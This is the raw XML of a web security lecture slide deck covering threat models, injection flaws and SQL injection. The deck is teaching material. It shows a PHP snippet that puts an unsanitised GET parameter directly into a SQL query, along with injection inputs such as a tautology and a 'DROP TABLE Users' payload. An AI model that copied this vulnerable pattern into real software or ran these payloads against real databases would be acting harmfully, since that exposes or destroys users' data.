        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1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$id = $_GET['id'];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"SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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</a:b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	    WHERE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user_id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‘$id’";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$result =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mysql_query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($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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );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4572000" y="3657600"/>
            <a:ext cx="3833906" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391"/>
              <a:gd name="adj3" fmla="val 16667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1’ OR 1=1;#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2012-07-02 at 2.35.2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286000"/>
            <a:ext cx="34417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1928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 worse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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869577" y="2226235"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1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$id = $_GET['id'];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"SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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</a:b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	    WHERE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user_id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‘$id’";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$result =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mysql_query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($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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4800600"/>
            <a:ext cx="5410200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23413"/>
              <a:gd name="adj2" fmla="val -86289"/>
              <a:gd name="adj3" fmla="val 16667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lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>′  ;  DROP TABLE  Users ; -- #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4212" y="6308209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Command not verified, but you get the idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="http://www.jellyneo.net/images/museum/pets/oldpets_jetsam_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657203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5373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Application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0021" y="5029200"/>
            <a:ext cx="911250" cy="126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370" y="1941128"/>
            <a:ext cx="2182611" cy="1270475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2656391" y="2332240"/>
            <a:ext cx="383121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459195" y="3810000"/>
            <a:ext cx="0" cy="1143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7924800" y="3810000"/>
            <a:ext cx="0" cy="1143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340" name="Picture 4" descr="http://i.i.cbsi.com/cnwk.1d/i/tim/2011/03/16/Chrome-logo-2011-03-16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875" l="260" r="98182">
                        <a14:foregroundMark x1="51948" y1="48177" x2="51948" y2="48177"/>
                        <a14:foregroundMark x1="43117" y1="41667" x2="64935" y2="52344"/>
                        <a14:foregroundMark x1="38961" y1="54688" x2="58442" y2="606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383" y="2833563"/>
            <a:ext cx="1066800" cy="1064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2408843" y="1962908"/>
            <a:ext cx="4281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subdomain.mysite.com/folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Microsoft SQL Ser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4973" y="4907543"/>
            <a:ext cx="1682246" cy="1381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4" name="Picture 8" descr="http://www.geekpeek.net/wp-content/uploads/2013/07/Apache-Log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973" y="2685357"/>
            <a:ext cx="1850017" cy="1271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05600" y="1424221"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14346" name="Picture 10" descr="http://www.planet-source-code.com/vb/2010Redesign/images/LangugeHomePages/PHP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0106" y="3773258"/>
            <a:ext cx="1086267" cy="571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6788685" y="4194188"/>
            <a:ext cx="190468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Database Queries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33884" y="2339113"/>
            <a:ext cx="3898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HTML Page, JS file, CSS file, image, etc.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2633884" y="2685357"/>
            <a:ext cx="383121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11349" y="4421966"/>
            <a:ext cx="4090084" cy="147732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GET Requests: Used for requests for pages, resources, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST Requests: Used for form submissions, logins, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195634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3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64008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66917E9-C890-4124-BBEF-2FBCA2116E52}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99330" name="Picture 2" descr="Exploits of a M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4236" y="2277374"/>
            <a:ext cx="8444964" cy="25994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83796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Security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4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0" y="1052927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(By Threat Model)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0" y="1575045"/>
            <a:ext cx="1600200" cy="230428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091952"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2360624"/>
            <a:ext cx="2819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3162300" y="2727189"/>
            <a:ext cx="2819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203556" y="2969870"/>
            <a:ext cx="1395000" cy="139500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0" y="450598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Malicious Client Attacking Server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-1" y="5105400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SQL Injection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736" y="5543149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File System Traversal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-7884" y="5958994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Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784224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Security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5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0" y="1052927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(By Threat Model)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0" y="1575045"/>
            <a:ext cx="1600200" cy="230428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091952"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2360624"/>
            <a:ext cx="2819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3162300" y="2727189"/>
            <a:ext cx="2819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68209" y="3159921"/>
            <a:ext cx="1219200" cy="121920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0" y="450598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Malicious Server Attacking Client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-1" y="5105400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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking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736" y="5507782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History Probing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-7884" y="5958994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Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2867039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Security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6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0" y="1052927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(By Threat Model)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3928" y="1719488"/>
            <a:ext cx="1240078" cy="178571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2153769"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2422441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2819400" y="2789006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05372" y="2973460"/>
            <a:ext cx="1219200" cy="121920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0" y="450598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Malicious User Attacking Other Users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-1" y="5105400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Cross-Site Scripting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736" y="5507782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Cross-Site Request Forgery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-7884" y="5958994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Remote Script Inclusion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6565079" y="2150211"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5410200" y="2325551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5410200" y="2690819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584698" y="3212956"/>
            <a:ext cx="1102102" cy="110210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619182" y="2992249"/>
            <a:ext cx="1102102" cy="1102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811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Security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7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0" y="1052927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(By Threat Model)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752600"/>
            <a:ext cx="1240078" cy="178571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6448" y="2019250"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171709" y="2283091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2171709" y="2649656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158272" y="3102848"/>
            <a:ext cx="1219200" cy="121920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0" y="472486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Malicious Server in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Mashup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>” Web Application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-1" y="5324286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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking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736" y="5726668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Information Stealing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5886459" y="2284388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5886459" y="2649656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763678" y="3226552"/>
            <a:ext cx="1102102" cy="110210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53000" y="3161397"/>
            <a:ext cx="1102102" cy="1102102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2151" y="1752600"/>
            <a:ext cx="1240078" cy="178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072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Security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8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0" y="1052927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(By Threat Model)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752600"/>
            <a:ext cx="1240078" cy="178571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6448" y="2019250"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171709" y="2283091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2171709" y="2649656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667259" y="3161397"/>
            <a:ext cx="1219200" cy="121920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0" y="472486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Malicious User in Multi-Server Application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-1" y="5324286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Single sign-on (Facebook, Twitter, etc.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Sign in as someone else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736" y="5726668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Multi-Party Payment (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Amazon Payments):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Buy things for free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5886459" y="2284388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5886459" y="2649656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763678" y="3226552"/>
            <a:ext cx="1102102" cy="110210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65422" y="3265511"/>
            <a:ext cx="1102102" cy="1102102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2151" y="1752600"/>
            <a:ext cx="1240078" cy="178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193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Injection Flaws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921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aEgROsvYJr9WlM1wRei0f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R6xg7Dt6H5Yz7z7DT3FG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P2pIhzqOomffMJobGx7WB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Zh0mnJPcxXhtguRpmTGS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kSMneHn7yrNI37IUbHZbP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YisUkgadgIqnX8zZu7Ppp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FyrKHrIYTvM1UtVkn7Xkb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iF9AlbcRmpT8DUszyJvhO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BWe54aJHs4EAfMB75wL1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8LQ0RNyeOUgm4dmg727FX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t2EGYrDYvMNeOse3jW8e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o2HWuJV9V0smEon833pS8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jTHnLPpJTtpjhOmaO7APo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zPoT13JbwJyJILYBGNzMS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PuaqH871DqlPjSYRNl0IW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Ly5AbdqNgCBf0UJBmA3u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nSs6CO0dMam9JBk6XUBQ9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e3R47cZpEszDac84BBM3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TRa7ggC9TgYEEpfxHOdmv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z6r8XTiZ36SNaZT0VJNv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FvyJO4UYPuVYh4G8iJQUc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aDbSJvOQYWtWxGbyfln2P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qvo4Ium2FZAvgeaSXL2Av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dmHq0BQ1hpzXQZzFl9NZ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T3wRDPQI7iQcqObivc0XF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mzPbYz0efPNzsEU8Y1bzh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7EzKt2EAZdYPGW2rQgHT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oQmxoneZL6N5saCe5YAE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BDXY5xaURne6gJoWDgm0r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2BtRPCaIjobNfIzphGOR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RmUTP9kjiP9IBlueIyK93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VstFmeZFbADCK7WVM1n0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Ew7eV3Yf65l1rspaM6kC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tY7C9JbeBmvHCbxp1qMTk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4ZAniMMJL3JzNWx8jWGWt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gJGtwBehFtG5s8EyLctmk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hREtCENoVH5wIQHOgavto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TIuptKbut6eYrOP3ZAuhy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ZVqNQWWiRQT1YWYca2dr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hJpSYcbVZ7HUIyZGTeyaf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5pQS4Mpr36K1EGnYXJ7WQ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k4dpdt8ZS4JTEZ268ovx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9HUjiVgO3ixj5MFEzWj4d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hL2oWRBIriIJUwvUadJ4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M879Xa5DQyah1pW5lDQqn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llUgrtPzeZmtp9hUZodlQ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AmR89EL5l9FQpGuGq7SR3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mq6mDfekQFA6KxoijaO8D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NzJAqiX5sYaQ0q1N1vR0j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giWWh8NI3U59CxC3PVnKd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WTxXgw8ihDTNirDu1PiJV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LQOtaYFWDyNEm2okRhzLD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fPebplUxstGG8G9MlaCk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0E4A5GY0a9CjBYfZzk255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YGUHa4Vo8jrTPA6Ofdzri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ZyBZkxJBNCN0cZvZL09Xw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3O5axlBhiUfGFoGnvT5L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SH9ETK5OwD1sC6C0wzNQ0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E9VI8RHFmxuKWn0TsQcto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FdLAKvmvXail30JaCd7Qh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XR9fZD7XEx72tHWx6cjRz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sAj0ahdYmykbgTqvvJoZ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0V1Wiyq8TI2mgrCoimzh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xl98tW482U5y9yxXQxUeK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t1cXzmRPhqG21gPc4NxFz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UDQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="template">
  <a:themeElements>
    <a:clrScheme name="DBrumley201205 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E1E1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="990000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00709E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241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28575" cap="flat" cmpd="sng">
          <a:miter lim="800000"/>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="2800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:defRPr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  <a:lnDef>
      <a:spPr>
        <a:ln w="57150">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:tailEnd type="triangle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7448</TotalTime>
  <Words>2566</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>412</Paragraphs>
  <Slides>30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Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>Web Security </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Application Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Injection Flaws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Getting a Shell</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>SQL Primer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic Queries</vt:lpstr>
      <vt:lpstr>Example Query</vt:lpstr>
      <vt:lpstr>Join Example</vt:lpstr>
      <vt:lpstr>Tautologies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Even worse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Darpa Presentation</dc:title>
  <dc:creator>ed</dc:creator>
  <cp:lastModifiedBy>EMMY WAHYUNINGTYAS</cp:lastModifiedBy>
  <cp:revision>1459</cp:revision>
  <cp:lastPrinted>2012-09-29T01:49:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-21T12:01:33Z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false</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.DocumentId">
    <vt:lpwstr>11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Google.Documents.PluginVersion">
    <vt:lpwstr>2.0.2424.7283</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Google.Documents.MergeIncapabilityFlags">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>